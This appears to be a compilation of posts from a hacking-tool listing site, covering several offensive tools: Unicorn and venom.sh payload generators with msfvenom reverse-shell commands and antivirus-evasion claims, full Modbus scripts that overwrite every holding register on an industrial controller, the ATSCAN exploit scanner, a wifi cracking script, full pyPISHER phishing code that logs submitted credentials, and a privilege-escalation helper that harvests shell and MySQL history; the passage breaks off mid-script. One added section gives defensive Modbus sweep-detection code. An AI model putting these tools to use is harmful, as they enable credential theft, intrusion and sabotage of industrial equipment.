Channel: Code Scripting – Security List Network™

Magic Unicorn Attack Vector v2.2.


Changelog v2.2:
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but it's better than before) – AV picking up on variables and base64 encoded strings

unicorn v2.2

Unicorn is a PowerShell injection tool utilizing Matthew Graeber's attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
./unicorn --help
Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port
Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip | Clone Url
Source: TrustedSec | https://www.trustedsec.com/ | Our Post Before


Small Linux utils and penetration testing utils.


linux-pentest-util is a small collection of Linux utilities and penetration-testing utilities.

Requirements:
+ Nmap
+ Python 2.7.x

Collection of Utilities
Most notable util:
+ smalictrace.py — trace what methods can call/use a method, a field, or a class; read from smali files; usually Apktool is used instead of smali directly

smalictrace

Notable utils:
+ cexec — execute programs/scripts concurrently with limit and queue a.k.a. process pool
+ chdelim — change text delimiter
+ csvmerge — merge/group rows in CSV file based on equivalent columns
+ csvunmerge — reverse of csvmerge
+ httpserver.py — simple HTTP server; can be used to transfer files
+ nmap2csv — convert Nmap result to CSV
+ nmapfilter.sh — filter Nmap result
+ nmaptotal.sh — execute Nmap killer scan by using cexec
+ switchip.sh — handy tool to switch (static) IP address by name

Other utils:
+ brute.py — brute force generator
+ Brute.groovy — brute force generator
+ pkcs5.py — PKCS#5 (PKCS#7) pad/unpad
+ sqldecipher.sh — SQLCipher decipherer

brute force generator

Usage:

git clone https://github.com/fikr4n/linux-pentest-util && cd linux-pentest-util
(now run the individual utilities you need one by one)

Source: https://github.com/fikr4n

venom.sh v1.0.12 – Codename : redteam_dev.


CHANGELOG VERSION 1.0.12 17/4/2016 codename: redteam_dev
FUNCTION
——————————————————————————————
improved -> no more need to write the extension (.exe .bat etc) in payload output name
added -> x64 arch payloads added to ‘available payloads list’
added -> payload.vbs [powershell base64 enc] exec.vbs template
added -> payload.exe [powershell base64 enc] c template compiled to stand-alone exec
added -> ‘system built-in shells’ -> simple powershell shell (tcp under powershell)
added -> ‘hta-to-javascript.html’ further encrypt hta payloads (thanks to 0xyg3n)
added -> ‘VBS-crypter.exe’ (thanks to suriya) further encrypt vbs payloads

venom.sh v1.0.12 codename redteam_dev

[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

Codename: Final Polymorphic Stub. You can see what is a different


Komodo Venom v1.0.10

The script uses msfvenom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the generated shellcode into one function (example: python) “the python function will execute the shellcode in RAM”, uses compilers such as gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file, and also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).

The ‘shellcode generator’ tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, powersploit, etc. “P.S. some payloads are undetectable by AV solutions yes!!!” One of the reasons for that is the use of a function to execute the 2nd stage of the shell/meterpreter directly in the target's RAM.

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON

F – FAQ (frequently asked questions)
E – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd crisp-shellcode-generator-shell
git pull origin master

If Broken you can download Mirror Manually at: http://sourceforge.net/code-snapshots/git/c/cr/crisp-shellcode-generator/shell.git/crisp-shellcode-generator-shell-a4bd07df390856096dc2788d46b9838c60bd1c28.zip


[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats,
such as: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command: sudo msfvenom --help-formats

Now let's generate a simple shellcode for windows/shell/reverse_tcp,
choosing powershell as the output format. Note that we will not use
the -o (save the payload) flag, so the generated shellcode
will only be displayed in the current terminal window.
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before | Or Download Old Source: shell.tar.gz (24.9 MB)
Source :http://sourceforge.net/p/crisp-shellcode-generator/

MAS – Modbus Attack Scripts.


MAS – Modbus Attack Scripts.
File List:
– read_all_holding_registers.py: Read all holding registers from a TCP MODBUS slave.
– write_all_holding_registers.py: Write all holding registers on a TCP MODBUS slave.

Requirements:
+ Python 2.7.x
+ Pymodbus is a full Modbus protocol implementation using twisted for its asynchronous communications core.

MAS – Modbus Attack Script

Usage:

pip2 install -U pymodbus
git clone https://github.com/romainallain/mas && cd mas
python read_all_holding_registers.py -h
python write_all_holding_registers.py -h

read_all_holding_registers.py Script:

#!/usr/bin/env python

"""
File: read_all_holding_registers.py
Desc: Read all holding registers from a TCP MODBUS Slave
Version: 0.0.2
"""

__author__ = 'rm'

from pymodbus.client.sync import ModbusTcpClient
import argparse
import sys
import collections


class ModbusException(Exception):
    _codes = {
        1:  'ILLEGAL FUNCTION',
        2:  'ILLEGAL DATA ADDRESS',
        3:  'ILLEGAL DATA VALUE',
        4:  'SLAVE DEVICE FAILURE',
        6:  'SLAVE DEVICE BUSY'
    }

    def __init__(self, code):
        self.code = code
        self.message = ModbusException._codes.get(code, 'Unknown Modbus Exception')

    def __str__(self):
        return "Modbus Error. Exception %d: %s" % (self.code, self.message)


def status(msg):
    sys.stderr.write(msg[:-1][:39].ljust(39,' ')+msg[-1:])

def validate_ipv4(s):
    pieces = s.split('.')
    if len(pieces) != 4: return False
    try: return all(0<=int(p)<256 for p in pieces)
    except ValueError: return False

def scan():
    
    parser = argparse.ArgumentParser(description="Read all holding registers from a TCP MODBUS Slave")
    parser.add_argument("ip", help="IP address of the slave")
    parser.add_argument("-p", "--port", dest="port", help="Modbus Port. Defaults to 502", type=int, metavar="PORT", default=502)
    parser.add_argument("-u", "--uid", dest="uid", help="Modbus Unit ID. Defaults to 1", type=int, metavar="UID", default=1)
    parser.add_argument("-sa", "--start-address", dest="start_address", help="Starting Address for the scanner. Defaults to 1", type=int, metavar="START", default=1)
    parser.add_argument("-ea", "--end-address", dest="end_address", help="Ending Address for the scanner. Defaults to 65535", type=int, metavar="END", default=65535)
    
    args = parser.parse_args()
    
    ip = args.ip

    # ip address format verification
    if not validate_ipv4(ip):
        print "ERROR: IP address is invalid\n\n"
        parser.print_help()
        exit()

    print 'Connecting to %s...' % ip,
    # connect to modbus slave
    client = ModbusTcpClient(ip, args.port)
    client.connect()
    if client.socket == None:
        print "ERROR: Could not connect to %s." %ip
        exit()
    print ' Connected.'

    # TODO add ETA mechanism
    results = {}
    for addr in range(args.start_address, args.end_address + 1):  # end address is inclusive
        hr = client.read_holding_registers(addr, 1, unit=args.uid)  # unit value is device id of the slave (UID)
        if hr.function_code == 3:  # success: the response echoes function code 0x03
            results[addr] = hr.registers[0]
        # on failure the slave answers with 0x83 (131) plus an exception code, cf. Modbus doc

    client.close()
    print 'Register scanning is finished (%d registers were tried)' % (args.end_address - args.start_address + 1)
    # sort the results by address for printing
    ordered_results = collections.OrderedDict(sorted(results.items()))
    for addr, value in ordered_results.iteritems():
        print 'Addr {0} \t{1}'.format(addr, value)

if __name__=="__main__":
    try:
        scan()
    except KeyboardInterrupt:
        status("Ctrl-C happened\n")

write_all_holding_registers.py Script:

#!/usr/bin/env python

"""
File: write_all_holding_registers.py
Desc: Write all holding registers on a TCP MODBUS Slave
Version: 0.0.1
"""

__author__ = 'rm'

from pymodbus.client.sync import ModbusTcpClient
import argparse
import sys


class ModbusException(Exception):
    _codes = {
        1:  'ILLEGAL FUNCTION',
        2:  'ILLEGAL DATA ADDRESS',
        3:  'ILLEGAL DATA VALUE',
        4:  'SLAVE DEVICE FAILURE',
        6:  'SLAVE DEVICE BUSY'
    }

    def __init__(self, code):
        self.code = code
        self.message = ModbusException._codes.get(code, 'Unknown Modbus Exception')

    def __str__(self):
        return "Modbus Error. Exception %d: %s" % (self.code, self.message)


def status(msg):
    sys.stderr.write(msg[:-1][:39].ljust(39,' ')+msg[-1:])

def validate_ipv4(s):
    pieces = s.split('.')
    if len(pieces) != 4: return False
    try: return all(0<=int(p)<256 for p in pieces)
    except ValueError: return False

def scan():
    
    parser = argparse.ArgumentParser(description="Write all holding registers on a TCP MODBUS Slave")
    parser.add_argument("ip", help="IP address of the slave")
    parser.add_argument("-p", "--port", dest="port", help="Modbus Port. Defaults to 502", type=int, metavar="PORT", default=502)
    parser.add_argument("-u", "--uid", dest="uid", help="Modbus Unit ID. Defaults to 1", type=int, metavar="UID", default=1)
    parser.add_argument("-sa", "--start-address", dest="start_address", help="Starting Address for the writer. Defaults to 1", type=int, metavar="START", default=1)
    parser.add_argument("-ea", "--end-address", dest="end_address", help="Ending Address for the writer. Defaults to 65535", type=int, metavar="END", default=65535)
    parser.add_argument("-v", "--value", dest="value", help="Value that will be written. Defaults to 7777", type=int, metavar="VALUE", default=7777)
    
    args = parser.parse_args()
    
    ip = args.ip

    # ip address format verification
    if not validate_ipv4(ip):
        print "ERROR: IP address is invalid\n\n"
        parser.print_help()
        exit()

    print 'Connecting to %s...' % ip,
    # connect to modbus slave
    client = ModbusTcpClient(ip, args.port)
    client.connect()
    if client.socket == None:
        print "ERROR: Could not connect to %s." %ip
        exit()
    print ' Connected.'

    # TODO add ETA mechanism
    results = []
    for addr in range(args.start_address, args.end_address + 1):  # end address is inclusive
        hr = client.write_registers(addr, args.value, unit=args.uid)  # unit value is device id of the slave (UID)
        if hr.function_code == 16:  # success: the response echoes function code 0x10
            results.append(addr)
        # on failure the slave answers with 0x90 (144) plus an exception code, cf. Modbus doc

    client.close()
    print 'Register writing is finished (%d addresses were tried)' % (args.end_address - args.start_address + 1)
    print 'Writing was successful on these %d addresses:' % len(results)
    print results

if __name__=="__main__":
    try:
        scan()
    except KeyboardInterrupt:
        status("Ctrl-C happened\n")
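Both MAS scripts sweep every holding-register address with one request per address, and a slave answers each miss with an exception response (0x83 for a failed read, 0x90 for a failed write). The following Python 3 code is an added example for the defending side, not part of the MAS project: it decodes Modbus/TCP frames, names the exception codes from the scripts' table, and flags a unit that is written at many distinct addresses or returns many exception responses. The constructed frames, the thresholds and all function names are assumptions made here for illustration.

```python
import struct
from collections import Counter, defaultdict

# Exception codes from the MAS scripts' table (Modbus Application Protocol spec, section 7)
EXCEPTION_CODES = {1: 'ILLEGAL FUNCTION', 2: 'ILLEGAL DATA ADDRESS', 3: 'ILLEGAL DATA VALUE',
                   4: 'SLAVE DEVICE FAILURE', 6: 'SLAVE DEVICE BUSY'}
READ_HOLDING_REGISTERS = 0x03     # a failed read is answered with 0x83 (131)
WRITE_MULTIPLE_REGISTERS = 0x10   # a failed write is answered with 0x90 (144)


def parse_modbus_tcp(frame, direction):
    """Parse one Modbus/TCP ADU (7-byte MBAP header + PDU).

    direction is 'request' (master -> slave) or 'response' (slave -> master). The result
    carries tid, uid, fc (exception bit stripped), the start address and quantity of a
    0x03/0x10 request, and the exception name of an exception response. Malformed -> None.
    """
    if len(frame) < 8:
        return None
    tid, proto, length, uid = struct.unpack('>HHHB', frame[:7])
    # MBAP: protocol id is always 0; length counts the unit-id byte plus the PDU
    if proto != 0 or length != len(frame) - 6:
        return None
    pdu = frame[7:]
    fc = pdu[0]
    msg = {'tid': tid, 'uid': uid, 'fc': fc & 0x7F, 'exception': None, 'addr': None, 'qty': None}
    if fc & 0x80:
        # exception response: function code with the high bit set, then one exception code
        if direction != 'response' or len(pdu) != 2:
            return None
        msg['exception'] = EXCEPTION_CODES.get(pdu[1], 'Unknown Modbus Exception')
    elif direction == 'request' and fc in (READ_HOLDING_REGISTERS, WRITE_MULTIPLE_REGISTERS):
        if len(pdu) < 5:
            return None
        msg['addr'], msg['qty'] = struct.unpack('>HH', pdu[1:5])
    return msg


def detect_register_sweep(frames, max_distinct_writes=16, max_exceptions=16):
    """frames: iterable of (direction, bytes) in capture order; returns {uid: [reasons]}.

    A unit is flagged when a master writes to more distinct register addresses than a
    normal HMI cycle touches, or when the slave answers with an unusual number of
    exception responses. Both thresholds are assumptions to tune against a baseline.
    """
    write_addrs = defaultdict(set)
    exceptions = Counter()
    for direction, raw in frames:
        m = parse_modbus_tcp(raw, direction)
        if m is None:
            continue
        if direction == 'request' and m['fc'] == WRITE_MULTIPLE_REGISTERS:
            write_addrs[m['uid']].add(m['addr'])
        elif m['exception'] is not None:
            exceptions[m['uid']] += 1
    findings = {}
    for uid in sorted(set(write_addrs) | set(exceptions)):
        reasons = []
        if len(write_addrs[uid]) > max_distinct_writes:
            reasons.append('%d distinct registers written' % len(write_addrs[uid]))
        if exceptions[uid] > max_exceptions:
            reasons.append('%d exception responses' % exceptions[uid])
        if reasons:
            findings[uid] = reasons
    return findings


def _adu(tid, uid, pdu):
    """Constructed Modbus/TCP frame: MBAP header in front of the given PDU."""
    return struct.pack('>HHHB', tid, 0, len(pdu) + 1, uid) + pdu


def write_sweep_capture(start, end, uid=1, value=7777):
    """Constructed capture imitating write_all_holding_registers.py: one write_registers
    request per address carrying the script's default value 7777, each answered with
    0x90 / exception 2 (ILLEGAL DATA ADDRESS) because the slave has no such register."""
    frames = []
    for tid, addr in enumerate(range(start, end + 1)):
        req = struct.pack('>BHHBH', WRITE_MULTIPLE_REGISTERS, addr, 1, 2, value)
        frames.append(('request', _adu(tid, uid, req)))
        frames.append(('response', _adu(tid, uid, bytes([WRITE_MULTIPLE_REGISTERS | 0x80, 2]))))
    return frames


def normal_poll_capture(uid=1):
    """Constructed capture of a benign poll: read 10 holding registers at address 0, success."""
    req = struct.pack('>BHH', READ_HOLDING_REGISTERS, 0, 10)
    resp = bytes([READ_HOLDING_REGISTERS, 20]) + b'\x00\x00' * 10
    return [('request', _adu(7, uid, req)), ('response', _adu(7, uid, resp))]


if __name__ == '__main__':
    print(detect_register_sweep(normal_poll_capture()))       # {}
    print(detect_register_sweep(write_sweep_capture(1, 40)))  # {1: ['40 distinct registers written', '40 exception responses']}
```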

Source: https://github.com/romainallain

ATSCAN v8.1 stable – perl script for vulnerable Server, Site and dork scanner.


Changelog 8.1:
+ Bugfix: Add ports scan info, Optimize code, Rebuild url scan process.
+ Logo Banner Change.

atscan v7.4

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, CentOS | if you use Windows you can download manually.

Examples:
Simple search:
Search: --dork [dork] --level [level]
Search + get ip: --dork [dork] --level [level] --ip
Search + get ip + server: --dork [dork] --level [level] --ip --server
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + get ip+server: --dork [dorks.txt] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]

Subscan from Search Engine:
Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:
Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:
-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ...

Server:
Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:
--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v8.1.zip | v8.1.tar.gz

wifi hacking script v1.3 supported securities: WEP, WPS, WPA, WPA2.


Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2)
Menu Options:
0) Full Automatic Mode (Applies To All Encryption Types)
1) WEP Mode (Commands can be executed from a menu to easily circumvent any WEP connection)
2) WPS Mode (May also have WPA, WPA2, or WEP displayed. Ignore this, as it has no effect on success rate)
3) WPA Mode (Capture 4-way handshake, dictionary attack, bruteforce and others, VERY LOW SUCCESS RATE)
4) WPA2 Mode (Almost identical to WPA attacks. This mode also carries a VERY LOW SUCCESS RATE)

wifi hacking script v1.3

usage:

git clone https://github.com/esc0rtd3w/wifi-hacker && cd wifi-hacker
chmod +x wifi-hacker.sh
./wifi-hacker.sh

Source: https://github.com/esc0rtd3w

pyPISHER – Simple python app to generate a malicious phishing website.


This is a simple python tool to create a malicious website for password phishing. Please use this tool responsibly.
Requirements:
– Python 2.7.x
– urllib2

pyPISHER

Operating system Support: Debian, Mac OSX, Ubuntu Linux, FreeBSD, REDHAT, FEDORA, Arch Linux & Kali Linux 2.0

Usage:

git clone https://github.com/Renato-Silva/pyPISHER && cd pyPISHER
python pyPISHER.py

Script:

import os
import sys, traceback
import urllib2

#Clear console
def clear():
    os.system('cls' if os.name=='nt' else 'clear')
clear()

#Print name and description
print '''
\033[1;31m
     $$$$$   $$   $$        $$$$$   $$ $$$$$$ $$  $$ $$$$$$$ $$$$$
     $$   $$  $$ $$         $$   $$ $$ $$     $$  $$ $$      $$   $$
     $$   $$   $$           $$   $$ $$ $$     $$  $$ $$      $$   $$
     $$$$$     $$           $$$$$   $$ $$$$$$ $$$$$$ $$$$$   $$$$$
     $$        $$           $$      $$     $$ $$  $$ $$      $$  $$
     $$        $$           $$      $$     $$ $$  $$ $$      $$   $$
     $$        $$           $$      $$ $$$$$$ $$  $$ $$$$$$$ $$   $$
\033[1;m
\033[1;31m
Simple python app to gerenate a mallicious phishing website. 
\033[1;m
 \033[1;32m+ -- -- +=[ Author: RenatoSilva | Github: github.com/Renato-Silva\033[1;m
'''




#Ask user input for url
_url =raw_input('Website to copy (ex http://google.com): ')
#Ask user input for logs file name
_logsfilename =raw_input('Logs file name: ')+".txt"
#Ask user input for PHP file name
_phpfilename =raw_input('PHP file name: ')+".php"
#Ask user input for where to redirect
_redirect =raw_input('Redirect to: ')

#PHP script to add credentials to log
php='<?php\nheader (\'Location: '+_redirect+' \');\n$handle = fopen("'+_logsfilename+'", "a");\nforeach($_POST as $variable => $value) {\n\tfwrite($handle, $variable);\n\tfwrite($handle, "=");\n\tfwrite($handle, $value);\n\tfwrite($handle, "\\r\\n");}\nfwrite($handle, "===============\\r\\n");\nfclose($handle);\nexit;\n?>'

#Open PHP file, write script then close it
php_file = open(_phpfilename, 'w')
php_file.write(php)
php_file.close()

#Read webpage source code
response = urllib2.urlopen(_url)
page_source = response.read()
html_file = open("index.html", "w")
html_file.write(page_source)
final_source = ""
with open('index.html') as f:
    for line in f:
        if line.find("forms") == -1:
            final_source = final_source + "\n" + line
        else:
            final_source = final_source + "\n" + '<form name="f1" method="post" action=login.php?"login.php" id="f1">'
html_file.close()
html_file = open("index.html", "w")
html_file.write(final_source)
html_file.close()

Source: https://github.com/Renato-Silva

ATSCAN v9.0 stable – perl script for vulnerable Server, Site and dork scanner.


Changelog v9.0:
+ NEW ARGS:
–regex
–sregex
–ifirst
–port
–pause
–ip

CHANGES:
+ new optim building
+ unique scans process
+ scan by regex
+ search by regex
+ optimized ports scan
+ added option to scan ips.
+ added option to choose where to install the tool
+ Now you can install in any system linux windows

Atscan scanner V 9.0

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, CentOS | if you use Windows you can download manually.

Examples:
Simple search:
Search: --dork [dork] --level [level]
Search + get ip: --dork [dork] --level [level] --ip
Search + get ip + server: --dork [dork] --level [level] --ip --server
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + get ip+server: --dork [dorks.txt] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]

Subscan from Search Engine:
Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:
Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:
-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ...

Server:
Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:
--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v9.0.zip | v9.0.tar.gz


Net::FTP::Brute – a bruteforce (p)ftp connection handler to bypass strange corporate firewalls.


Tries its best to establish a connection to an FTP server. If it cannot connect, it retries tirelessly for the network to come back up. If it can connect but cannot establish a DATA connection, it starts brute forcing with parallel FTP connections to find an open port.

perl module

You should use ftp in passive mode for brute-forcing to work best.

Usage:

git clone https://github.com/kivilahtio/Net-FTP-Brute && cd Net-FTP-Brute
cpan Modern::Perl
cpan Log::Log4perl
cpan Test::MockModule
perl Build.PL
./Build
./Build test
./Build install

Source: https://github.com/kivilahtio

Inspector is a Unix Privilege Escalation helper (Forensics, Kernel exploit list, process).


Inspector is a Unix privilege-escalation helper (forensics, kernel exploit list, process listing)
with these functions:
+ History files: MySQL and shell history
+ Forensics escalation
+ Process manager

Requirement:
+ Python 2.7.x
+ all linux platform support

usage:

wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py
python inspector.py

Script:

#!/usr/bin/env python

import os
import sys

# Global #######
file_history = []
no_can_open = 0
uname = ""
process_list = ""
kernel_version = ""
history_listing = ['.bash_history', '.mysql_history', '.bashrc', '.zshrc', '.zsh_history']
# home directories to search: /home and /root on Linux, /Users on OS X
search_roots = '/home /root /Users'
################


def find_files(name):
    """Return the paths of every file called `name` under search_roots (empty lines dropped)."""
    out = os.popen('find ' + search_roots + ' -name "' + name + '" -type f -print 2>/dev/null').read()
    return [line for line in out.split('\n') if line != '']


def prez():
    print """  _____                           _             
  \_   \_ __  ___ _ __   ___  ___| |_ ___  _ __ 
   / /\/ '_ \/ __| '_ \ / _ \/ __| __/ _ \| '__|
/\/ /_ | | | \__ \ |_) |  __/ (__| || (_) | |   
\____/ |_| |_|___/ .__/ \___|\___|\__\___/|_|   
                 |_|                            
{c} Github.com/Graniet"""


def getShell():
    # guess the login shell from the rc files present in the home directories
    if find_files('.bashrc'):
        return "bash"
    elif find_files('.zshrc'):
        return "zsh"
    else:
        return "sh?"


def print_file_lines(path):
    """Print every non-empty line of a history file; an unreadable file is reported, not fatal."""
    try:
        for element in open(path, 'r'):
            if element.strip() != '':
                print "[#] " + element.strip()
    except IOError:
        print "{!} Can't read " + path


def checkShellHistory():
    shell = getShell()
    files = find_files('.' + shell + '_history')
    if not files:
        print "{!} Can't read ." + shell + "_history"
    for path in files:
        print_file_lines(path)


def checkMySQL():
    files = find_files('.mysql_history')
    if not files:
        print "{!} Can't read .mysql_history"
    for path in files:
        print_file_lines(path)


def information():
    global uname
    global process_list
    global kernel_version
    kernel_version = os.popen('uname -r').read()
    uname = os.popen('uname -a').read()
    process_list = os.popen('ps axco user,command | grep root').read()
    print "========="
    print "= [!] User > " + os.popen('whoami').read().strip()
    print "= [!] Group > " + os.popen('id -Gn').read().strip()[:20]
    print "= [!] Shell > " + getShell()
    print "= [!] " + uname.strip()
    print "= [+] Command : process,kernel_exploit,forensic,history,help"
    print "========"


def process_listname():
    # list the processes running as root and point out a MySQL server among them
    for process in process_list.split('\n'):
        if process == '':
            continue
        print "# " + process
        if 'mysql' in process:
            print "#### [!] MySQL run in root? "


def analyse():
    global no_can_open
    for line in file_history:
        if not os.path.isfile(line):
            continue
        try:
            files = open(line, 'r')
        except IOError:
            no_can_open = no_can_open + 1
            continue
        print "{+} " + line.strip()
        for line2 in files:
            if line2.strip() == '':
                continue
            if 'mysql -u' in line2:
                print "# MySQL login found"
                print "\t(!) MySQL command line is used for login, example: mysql -u root -p"
                print "\t>>> " + line2.strip()
            if 'ssh' in line2:
                print "# SSH found"
                print "\t(!) SSH used for secure connection"
                print "\t>>> " + line2.strip()
        files.close()


def kernel_exploit():
    print "[!] kernel version: " + kernel_version


def history_help():
    print "=========="
    print "[+] MySQL history > history mysql"
    print "[+] Shell history > history shell"
    print "=========="


def main():
    # collect every history/rc file under the home directories once, then enter the prompt
    for fichier in history_listing:
        file_history.extend(find_files(fichier))
    information()
    try:
        while 1:
            prompt = raw_input('Inspector > ')
            if 'forensic' in prompt:
                analyse()
            if 'process' in prompt:
                process_listname()
            if 'kernel_exploit' in prompt:
                kernel_exploit()
            if 'history mysql' in prompt:
                checkMySQL()
            if 'history shell' in prompt:
                checkShellHistory()
            if 'help' in prompt:
                information()
            if prompt == "history":
